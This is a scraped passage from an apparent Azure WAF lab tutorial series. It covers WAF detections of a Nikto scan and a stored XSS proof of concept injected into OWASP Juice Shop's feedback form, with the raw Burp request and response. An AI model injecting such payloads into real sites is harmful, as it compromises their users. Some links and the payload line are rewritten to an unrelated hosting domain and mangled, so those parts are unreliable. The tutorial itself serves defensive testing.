src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244422iFF4C8DBC9A66E9D1/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_1-1609889556104.png" alt="Mohit_Kumar_1-1609889556104.png" /></span></P> <P>&nbsp;</P> <OL start="3"> <LI>After selecting the correct client IP, we scroll back up to the top of the Workbook and review the visualizations at the top, in the WAF Workbook.&nbsp; The sections of the workbook we will be using here are highlighted with <SPAN>alphabetized&nbsp;</SPAN>callouts in the below figure, we see that they map to the following sections</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-60px">a. WAF actions filter</P> <P class="lia-indent-padding-left-60px">b. Top 40 Blocked Request URI addresses, filter to single URI address</P> <P class="lia-indent-padding-left-60px">c. Top 50 event trigger, filter by rule name</P> <P class="lia-indent-padding-left-60px">d. Message, full details</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609963440098.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244600iC07B01CB2710FFFA/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1609963440098.png" alt="Mohit_Kumar_0-1609963440098.png" /></span></P> <DIV id="tinyMceEditorMohit_Kumar_2" class="mceNonEditable lia-copypaste-placeholder">&nbsp;</DIV> <P>&nbsp;</P> <H3>Overview of the Workbook sections</H3> <P>&nbsp;</P> <OL class="lia-list-style-type-lower-alpha"> <LI>Starting from the top, the <STRONG>WAF actions filter </STRONG>shows the number of matches and the blocked requests</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_3-1609797570523.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244021iB3265F9696090B44/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_3-1609797570523.png" alt="Mohit_Kumar_3-1609797570523.png" /></span></P> <P>&nbsp;</P> <OL class="lia-list-style-type-lower-alpha" start="2"> <LI>We can then look at the <STRONG>Top 40 Blocked Request URI addresses, filter to single URI address </STRONG>to identify the top URIs for which requests were blocked by WAF</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_4-1609797610173.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244022i47A3A89DC0C3673D/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_4-1609797610173.png" alt="Mohit_Kumar_4-1609797610173.png" /></span></P> <P>&nbsp;</P> <OL class="lia-list-style-type-lower-alpha" start="3"> <LI>The <STRONG>Top 50 event trigger, filter by rule name </STRONG>shows all the rules which evaluated the scanner traffic</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_5-1609797663262.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244023iBF0DD58B23B1C549/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_5-1609797663262.png" alt="Mohit_Kumar_5-1609797663262.png" /></span></P> <P>&nbsp;</P> <UL> <LI>The below table shows an extract of the <STRONG>Top 50 event trigger, filter by rule name </STRONG>output for scanner traffic.&nbsp; This data clearly shows that WAF was able to detect the security scanner and blocked suspicious requests/payloads from the Nikto Scanner.&nbsp; This is expected because a security scanner will attempt to perform various types of operations to test security of the web application</LI> </UL> <P>&nbsp;</P> <TABLE> <TBODY> <TR> <TD width="597px" height="30px"> <P><STRONG>Rule</STRONG></P> </TD> <TD width="126px" height="30px"> <P><STRONG>count_</STRONG></P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>Found User-Agent associated with security scanner</P> </TD> <TD width="126px" height="30px"> <P>8906</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>Request Missing an Accept Header</P> </TD> <TD width="126px" height="30px"> <P>8906</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>GET or HEAD Request with Body Content.</P> </TD> <TD width="126px" height="30px"> <P>8860</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>Node-Validator Blacklist Keywords</P> </TD> <TD width="126px" height="30px"> <P>4553</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>SQL Injection Attack: Common Injection Testing Detected</P> </TD> <TD width="126px" height="30px"> <P>3354</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>Found request filename/argument associated with security scanner</P> </TD> <TD width="126px" height="30px"> <P>2422</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link</P> </TD> <TD width="126px" height="30px"> <P>2418</P> </TD> </TR> <TR> <TD width="597px" height="57px"> <P>Possible Remote File Inclusion (RFI) Attack: URL Payload Used w/Trailing Question Mark Character (?)</P> </TD> <TD width="126px" height="57px"> <P>2355</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>Detects basic SQL authentication bypass attempts 2/3</P> </TD> <TD width="126px" height="30px"> <P>2249</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>Detects MySQL comments, conditions and ch(a)r injections</P> </TD> <TD width="126px" height="30px"> <P>2233</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>Path Traversal Attack (/../)</P> </TD> <TD width="126px" height="30px"> <P>1698</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>OS File Access Attempt</P> </TD> <TD width="126px" height="30px"> <P>699</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>Remote Command Execution: Unix Shell Code Found</P> </TD> <TD width="126px" height="30px"> <P>682</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>XSS Attack Detected via libinjection</P> </TD> <TD width="126px" height="30px"> <P>667</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>SQL Injection Attack: SQL Tautology Detected.</P> </TD> <TD width="126px" height="30px"> <P>641</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>Possible XSS Attack Detected - HTML Tag Handler</P> </TD> <TD width="126px" height="30px"> <P>616</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>XSS Filter - Category 1: Script Tag Vector</P> </TD> <TD width="126px" height="30px"> <P>616</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>NoScript XSS InjectionChecker: HTML Injection</P> </TD> <TD width="126px" height="30px"> <P>616</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>Detects classic SQL injection probings 2/3</P> </TD> <TD width="126px" height="30px"> <P>455</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>Invalid character in request (non printable characters)</P> </TD> <TD width="126px" height="30px"> <P>342</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>Invalid character in request (null character)</P> </TD> <TD width="126px" height="30px"> <P>340</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>SQL Injection Attack</P> </TD> <TD width="126px" height="30px"> <P>272</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>Remote Command Execution: Unix Command Injection</P> </TD> <TD width="126px" height="30px"> <P>199</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>SQL Comment Sequence Detected.</P> </TD> <TD width="126px" height="30px"> <P>197</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>URL file extension is restricted by policy</P> </TD> <TD width="126px" height="30px"> <P>192</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>Restricted File Access Attempt</P> </TD> <TD width="126px" height="30px"> <P>178</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>SQL Hex Encoding Identified</P> </TD> <TD width="126px" height="30px"> <P>147</P> </TD> </TR> <TR> <TD width="597px" height="57px"> <P>Possible Remote File Inclusion (RFI) Attack: Common RFI Vulnerable Parameter Name used w/URL Payload</P> </TD> <TD width="126px" height="57px"> <P>136</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>PHP Injection Attack: High-Risk PHP Function Call Found</P> </TD> <TD width="126px" height="30px"> <P>128</P> </TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <OL class="lia-list-style-type-lower-alpha" start="4"> <LI>Review further details in the <STRONG>Message, full details </STRONG>section</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609890153348.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244426i3C23069AC845EB5A/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1609890153348.png" alt="Mohit_Kumar_0-1609890153348.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Key Takeaway</H2> <P>&nbsp;</P> <P>Using security scanners to perform web application vulnerability assessment scans to expose vulnerabilities in a target web application is a common technique used by attackers.&nbsp; When external adversaries can perform these scans against your web applications, they are able to learn about your application design and its vulnerabilities which could potentially lead to exploitation.&nbsp;</P> <P>&nbsp;</P> <P><STRONG>For web applications secured with it, Azure WAF can detect and protect against reconnaissance attacks executed with security scanners at the network edge, with its out of the box ruleset.</STRONG></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <TABLE border="1" width="100%"> <TBODY> <TR> <TD width="50%"> <H4>Previous:&nbsp;<A title="Setup an Azure WAF Attack Testing Lab" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-1-lab-setup-azure-web-application-firewall-security/ba-p/2030469" target="_blank" rel="noopener">Setup an Azure WAF Attack Testing Lab</A>&nbsp;</H4> </TD> <TD width="50%"> <H4>Next:&nbsp;<A title="Vulnerability Exploitation Playbook" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-3-vulnerability-exploitation-playbook-azure-waf-security/ba-p/2031047" target="_blank" rel="noopener">Vulnerability Exploitation Playbook</A></H4> </TD> </TR> </TBODY> </TABLE> <H4>&nbsp;</H4> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> Fri, 15 Jan 2021 02:00:34 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-2-reconnaissance-playbook-azure-waf-security-protection-and/ba-p/2030751 Mohit_Kumar 2021-01-15T02:00:34Z Part 3 - Vulnerability Exploitation Playbook: Azure WAF Security Protection and Detection Lab https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-3-vulnerability-exploitation-playbook-azure-waf-security/ba-p/2031047 <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2><FONT size="6">Tutorial: Vulnerability Exploitation Playbook</FONT></H2> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>Vulnerability Exploitation playbook is third in the four-part tutorial series for the Azure WAF protection and detection lab.&nbsp; The purpose of the Azure WAF security protection lab is to demonstrate <STRONG>Azure WAF</STRONG>'s capabilities in identifying and protecting against suspicious activities and potential attacks against your web applications.&nbsp; This playbook explains how to test Azure WAF's protections against a <STRONG>Cross Site Scripting (XSS)</STRONG> <STRONG>attack</STRONG> with emphasis on Azure WAF protection ruleset and logging capabilities.&nbsp; The lab does not include advanced application security concepts and is not intended to be a reference for application security testing as these areas are broader than the use cases demonstrated herein.</P> <P>&nbsp;</P> <P>This playbook demonstrates the protection capabilities of Azure WAF against a simulated <STRONG>Server Side</STRONG> <STRONG>XSS injection (Stored XSS)</STRONG> attack from common, real-world, publicly available hacking and attack tools.</P> <P>&nbsp;</P> <P>In this tutorial you will:</P> <OL> <LI>Simulate Cross Site Scripting (XSS) attack against the target OWASP Juice Shop application directly and then attack the same instance of the web application published through Azure WAF</LI> <UL> <LI>Inject a proof of concept (POC) XSS payload in the target OWASP Juice Shop application directly and then through Azure WAF</LI> </UL> <LI>Observe the difference in the web application behavior in the two scenarios</LI> <LI>Review the summarized logs in the WAF Workbook (<A title="Azure Monitor Workbook for WAF" href="#" target="_blank" rel="noopener">Azure Monitor Workbook for WAF</A>)</LI> </OL> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Prerequisites</H2> <P>&nbsp;</P> <OL> <LI><A title="Setup an Azure WAF Attack Testing Lab" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-1-lab-setup-azure-web-application-firewall-security/ba-p/2030469" target="_blank" rel="noopener">A completed Azure WAF security lab setup</A> <UL> <LI>We recommend following the lab setup instructions as closely as possible. The closer your lab is to the suggested lab setup, the easier it will be to follow the Azure WAF testing procedures.</LI> </UL> </LI> <LI><A title="Reconnaissance Playbook" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-2-reconnaissance-playbook-azure-waf-security-protection-and/ba-p/2030751" target="_blank" rel="noopener">Completion of the reconnaissance playbook tutorial</A></LI> </OL> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Configuring Burp Suite and Firefox</H2> <P>&nbsp;</P> <P>To inject the POC XSS exploit code in the OWASP Juice Shop application, we will connect to the Kali VM with RDP.&nbsp; Once connected, we will use <A href="#" target="_blank" rel="noopener"><STRONG>Burp Suite (Community Edition)</STRONG></A>, a powerful web application security research and analysis tool which is bundled in the Kali Linux distro.&nbsp; In this playbook, we will be using Burp Suite to inspect application requests and responses to understand what happens when injecting the POC XSS payload in the target web application is different scenarios.</P> <P>&nbsp;</P> <P>Burp Suite works as a client-side proxy and your web browser should point to Burp's Proxy Listener so, it can intercept requests and responses.&nbsp;</P> <P>&nbsp;</P> <OL> <LI>Sign into the Kali VM using your lab credentials</LI> <LI>Launch the web browser and ensure that you are able to access the OWASP Juice Shop website directly with URL http://owaspdirect-&lt;deployment guid&gt;.azurewebsites.net and also through Azure WAF with URL <A href="#" target="_blank" rel="noopener">http://juiceshopthruazwaf.com</A></LI> <LI>Launch <STRONG>Burp Suite</STRONG> by clicking on <STRONG>Applications</STRONG> on the top left and then click <STRONG>Web Application Analysis --&gt; burpsuite</STRONG></LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609891633850.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244430i76B4419777E1F8E1/image-size/medium?v=v2&amp;px=400" role="button" title="Mohit_Kumar_0-1609891633850.png" alt="Mohit_Kumar_0-1609891633850.png" /></span></P> <P>&nbsp;</P> <OL start="4"> <LI>In the "Burp Suite Community Edition" window, accept the defaults <STRONG>(Temporary project --&gt; Use Burp defaults --&gt; Start Burp) </STRONG>to start Burp Suite</LI> </OL> <P class="lia-indent-padding-left-30px"><BR /><FONT size="2"><STRONG>Figure 1 - Launch Burp Suite</STRONG></FONT></P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_1-1609798395329.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244072i633D15EC51C07A10/image-size/medium?v=v2&amp;px=400" role="button" title="Mohit_Kumar_1-1609798395329.png" alt="Mohit_Kumar_1-1609798395329.png" /></span></P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT size="2"><STRONG>Figure 2 - Launch Burp Suite</STRONG></FONT></P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609798603320.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244075i49E2DA2C741479E7/image-size/medium?v=v2&amp;px=400" role="button" title="Mohit_Kumar_0-1609798603320.png" alt="Mohit_Kumar_0-1609798603320.png" /></span></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <OL start="5"> <LI>When open, click on <STRONG>Target --&gt; Scope </STRONG>tabs and then add the 2 URLs for the Juice Shop website in the "<STRONG>Include in scope</STRONG>" box.&nbsp; This will setup Burp to only capture requests and responses for these specific websites while excluding traffic going to other destinations</LI> </OL> <P class="lia-indent-padding-left-60px">a. http://owaspdirect-&lt;deployment guid&gt;.azurewebsites.net</P> <P class="lia-indent-padding-left-60px" data-unlink="true">b. http://juiceshopthruazwaf.com/&nbsp;&nbsp;</P> <P>&nbsp;</P> <OL start="6"> <LI>The exclusions in the "<STRONG>Exclude from scope</STRONG>" are optional and will help reduce noise in the capture</LI> </OL> <P class="lia-indent-padding-left-60px">a. http://owaspdirect-&lt;deployment guid&gt;.azurewebsites.net/socket.io/</P> <P class="lia-indent-padding-left-60px" data-unlink="true">b. http://juiceshopthruazwaf.com/socket.io/</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609799465020.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244079iC0593408CAB9BB9F/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1609799465020.png" alt="Mohit_Kumar_0-1609799465020.png" /></span></P> <P class="lia-indent-padding-left-30px"><FONT size="2"><FONT color="#FF0000"><STRONG>!</STRONG></FONT><STRONG> IMPORTANT</STRONG>: &nbsp;For the scenarios demonstrated in this document, OWASP Juice Shop application was running on HTTP port 3000.&nbsp; This is not the case when you use the Azure WAF Attack Testing Lab Deployment Template as it configures the application to run on port 80, 443 and assigns it a URL.&nbsp; For the lab tutorials, you will connect to the application on HTTP port 80 only.&nbsp; The URL for the application will be http://owaspdirect-&lt;deployment guid&gt;.azurewebsites.net.&nbsp; &lt;deployment guid&gt; is unique to every deployment&nbsp;</FONT></P> <P>&nbsp;</P> <OL start="7"> <LI>Then click on the <STRONG>Proxy --&gt; Options </STRONG>tabs and verify that Burp Proxy is running on <STRONG>127.0.0.1:8080</STRONG></LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_1-1609799542335.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244080i2C42B4D29909BCC3/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_1-1609799542335.png" alt="Mohit_Kumar_1-1609799542335.png" /></span></P> <P>&nbsp;</P> <OL start="8"> <LI>Click on the <STRONG>Intercept</STRONG> tab and turn off intercept</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_2-1609799645213.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244081i7DD18C488FD7CD9C/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_2-1609799645213.png" alt="Mohit_Kumar_2-1609799645213.png" /></span></P> <P>&nbsp;</P> <OL start="9"> <LI>Launch Firefox browser on the Kali Linux VM and update the proxy settings to use Burp proxy listener under <STRONG>Menu --&gt; Preferences --&gt; Network Proxy --&gt; Settings --&gt; Manual proxy </STRONG>configuration and point it to <STRONG>127.0.0.1:8080</STRONG></LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_3-1609799670464.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244082i931EE54BFFE023C8/image-size/medium?v=v2&amp;px=400" role="button" title="Mohit_Kumar_3-1609799670464.png" alt="Mohit_Kumar_3-1609799670464.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Vulnerability Exploitation</H2> <P>&nbsp;</P> <P>After collecting and analyzing web application specific data from the various recon activities to detect vulnerabilities, an attacker can then successfully exploit the identified vulnerabilities with the intent to compromise a user or the application itself to elevate privileges.&nbsp; In this playbook, we will simulate a Cross Site Scripting (XSS) attack against the target application using a proof of concept (POC) exploit payload.</P> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Performing Cross Site Scripting (XSS) Attack against the Target Web Application</H2> <P>&nbsp;</P> <P>In this tutorial, you will perform a <STRONG>Server Side Cross Site Scripting (XSS)</STRONG> attack against the <STRONG>OWASP Juice Shop</STRONG> application two times.&nbsp;</P> <P>&nbsp;</P> <OL> <LI><STRONG>Scenario 1</STRONG>: Injecting the XSS payload in the target web application directly</LI> <LI><STRONG>Scenario 2</STRONG>: Injecting the same XSS payload in the same target web application protected by Azure WAF on Application Gateway</LI> </OL> <P>&nbsp;</P> <P>&nbsp;</P> <H3>Scenario 1:&nbsp; Injecting XSS payload when going to the OWASP Juice Shop Application directly</H3> <P>&nbsp;</P> <OL> <LI>Sign into the Kali VM using your lab credentials</LI> <LI>Using Firefox, browse directly to the Juice Shop site by going to http://owaspdirect-&lt;deployment guid&gt;.azurewebsites.net</LI> <LI>In Burp Suite, check the <STRONG>Proxy --&gt; HTTP history</STRONG> tab for request and response data&nbsp;for this website</LI> <LI>Click the website menu icon on the top left and then click on <STRONG>Customer Feedback</STRONG></LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609800025433.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244085i6847FFDC63B90A34/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1609800025433.png" alt="Mohit_Kumar_0-1609800025433.png" /></span></P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><STRONG><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_1-1609800066965.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244086i96BE67941678121C/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_1-1609800066965.png" alt="Mohit_Kumar_1-1609800066965.png" /></span></STRONG></P> <P class="lia-indent-padding-left-30px"><FONT size="2"><FONT color="#FF0000"><STRONG>!</STRONG></FONT><STRONG> IMPORTANT</STRONG>: &nbsp;For the scenarios demonstrated in this document, OWASP Juice Shop application was running on HTTP port 3000.&nbsp; This is not the case when you use the Azure WAF Attack Testing Lab Deployment Template as it configures the application to run on port 80, 443 and assigns it a URL.&nbsp; For the lab tutorials, you will connect to the application on HTTP port 80 only.&nbsp; The URL for the application will be http://owaspdirect-&lt;deployment guid&gt;.azurewebsites.net.&nbsp; &lt;deployment guid&gt; is unique to every deployment&nbsp;</FONT></P> <P>&nbsp;</P> <OL start="5"> <LI>In the <STRONG>Comment </STRONG>box of the <STRONG>Customer Feedback</STRONG> form, copy/paste the POC code<LI-CODE lang="javascript">&lt;iframe src="https://gorovian.000webhostapp.com/?exam=x-javascript&amp;colon;alert(`xss`)"&gt;</LI-CODE></LI> </OL> <OL start="6"> <LI>Give a <STRONG>Rating,</STRONG> respond to the <STRONG>CAPTCHA </STRONG>challenge and click <STRONG>Submit</STRONG></LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_2-1609800135831.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244087i911FCD10C59DC851/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_2-1609800135831.png" alt="Mohit_Kumar_2-1609800135831.png" /></span></P> <P>&nbsp;</P> <OL start="7"> <LI>Upon clicking <STRONG>Submit</STRONG>, you should see a <STRONG>Thank you </STRONG>message</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_3-1609800164802.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244088iDF314C45B67B09FC/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_3-1609800164802.png" alt="Mohit_Kumar_3-1609800164802.png" /></span></P> <P>&nbsp;</P> <OL start="8"> <LI>Switching back to Burp, we can see the following request and response for the Feedback that we submitted in Step 4 above</LI> </OL> <P>&nbsp;</P> <H3 class="lia-indent-padding-left-30px"><FONT size="2"><STRONG>Figure 1 – Request with XSS Payload in Burp Suite</STRONG></FONT></H3> <H3 class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609800320499.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244089i4EAFCD64A3ABB48B/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1609800320499.png" alt="Mohit_Kumar_0-1609800320499.png" /></span></H3> <P>&nbsp;</P> <H3 class="lia-indent-padding-left-30px"><FONT size="2"><STRONG>Figure 2 – Successful Response from Juice Shop in Burp Suite</STRONG></FONT></H3> <H3 class="lia-indent-padding-left-30px"><FONT size="2"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_1-1609800331974.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244090i87E0B09DC5A0A232/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_1-1609800331974.png" alt="Mohit_Kumar_1-1609800331974.png" /></span></FONT></H3> <P>&nbsp;</P> <P><FONT size="2"><STRONG>Raw Request and Response - Headers and Body</STRONG></FONT></P> <TABLE border="1" width="99.86187845303867%"> <TBODY> <TR> <TD width="52.62430939226519%" height="60px"> <H3><FONT size="2"><STRONG>Request</STRONG></FONT></H3> </TD> <TD width="47.23756906077348%" height="60px"> <H3><FONT size="2"><STRONG>Response</STRONG></FONT></H3> </TD> </TR> <TR> <TD width="52.62430939226519%" height="489px"> <P><FONT size="2">POST /api/Feedbacks/ HTTP/1.1</FONT></P> <P><FONT size="2">Host: juiceshopdirect.com:3000</FONT></P> <P><FONT size="2">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0</FONT></P> <P><FONT size="2">Accept: applicationhttps://techcommunity.microsoft.com/json, text/plain, */*</FONT></P> <P><FONT size="2">Accept-Language: en-US,en;q=0.5</FONT></P> <P><FONT size="2">Accept-Encoding: gzip, deflate</FONT></P> <P><FONT size="2">Referer: <A href="#" target="_blank" rel="noopener">http://juiceshopdirect.com:3000/</A></FONT></P> <P><FONT size="2">Content-Type: applicationhttps://techcommunity.microsoft.com/json</FONT></P> <P><FONT size="2">Content-Length: 105</FONT></P> <P><FONT size="2">Cookie: io=LsYFH7-IUxnCTaU5AAAW; language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss</FONT></P> <P><FONT size="2">Connection: close</FONT></P> <P><FONT size="2">&nbsp;</FONT></P> <P><FONT size="2">{"captchaId":7,"captcha":"3","comment":"<STRONG>&lt;iframe src=\"javascript&amp;colon;alert(`xss`)\"&gt;</STRONG> (anonymous)","rating":3}</FONT></P> </TD> <TD width="47.23756906077348%" height="489px"> <P><FONT size="2">HTTP/1.1 <STRONG>201 Created</STRONG></FONT></P> <P><FONT size="2">Access-Control-Allow-Origin: *</FONT></P> <P><FONT size="2">X-Content-Type-Options: nosniff</FONT></P> <P><FONT size="2">X-Frame-Options: SAMEORIGIN</FONT></P> <P><FONT size="2">Feature-Policy: payment 'self'</FONT></P> <P><FONT size="2">Location: /api/Feedbacks/11</FONT></P> <P><FONT size="2">Content-Type: applicationhttps://techcommunity.microsoft.com/json; charset=utf-8</FONT></P> <P><FONT size="2">Content-Length: 205</FONT></P> <P><FONT size="2">ETag: W/"cd-jaYV3gaD4F+1IP1EkEdoiAcNqfQ"</FONT></P> <P><FONT size="2">Vary: Accept-Encoding</FONT></P> <P><FONT size="2">Date: Sat, 10 Oct 2020 23:51:52 GMT</FONT></P> <P><FONT size="2">Connection: close</FONT></P> <P><FONT size="2">&nbsp;</FONT></P> <P><FONT size="2"><STRONG>{"status":"success"</STRONG>,"data":{"id":11,"comment":"&lt;iframe src=\"javascript&amp;colon;alert(`xss`)\"&gt; (anonymous)","rating":3,"updatedAt":"2020-10-10T23:51:52.834Z","createdAt":"2020-10-10T23:51:52.834Z","UserId":null}}</FONT></P> </TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <OL start="9"> <LI>The <STRONG>201 Created</STRONG> response code with a <STRONG>successful status</STRONG> tells us that the malicious POC XSS payload was stored successfully by the web application.&nbsp; We can now check if the XSS exploit is indeed working by going to the <STRONG>About Us </STRONG>page of the application.&nbsp; On this page, in addition to the company information, customer feedback is also displayed with rating and comments</LI> <LI>As shown in image on the right below, as soon as we browse to the <STRONG>About Us </STRONG>page, we see the pop-up with indicates that the exploit is working as expected</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609967539806.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244608i49C05D9B77A7E095/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1609967539806.png" alt="Mohit_Kumar_0-1609967539806.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <H3>Scenario 2:&nbsp; Injecting XSS payload when going to the OWASP Juice Shop Application through Azure WAF</H3> <P>&nbsp;</P> <P>We will now attempt to perform the injection of the same XSS payload in the <STRONG>Customer Feedback</STRONG> form on the Juice Shop website when going through Azure WAF on Application Gateway.</P> <P>&nbsp;</P> <OL> <LI>On Kali VM, launch a new instance of Firefox and browse to the Juice Shop website published through Application Gateway and protected with Azure WAF by going to <A href="#" target="_blank" rel="noopener">http://juiceshopthruazwaf.com/</A></LI> <LI>In Burp Suite, check the <STRONG>Proxy --&gt; HTTP history</STRONG> tab for the request and response data for this website</LI> </OL> 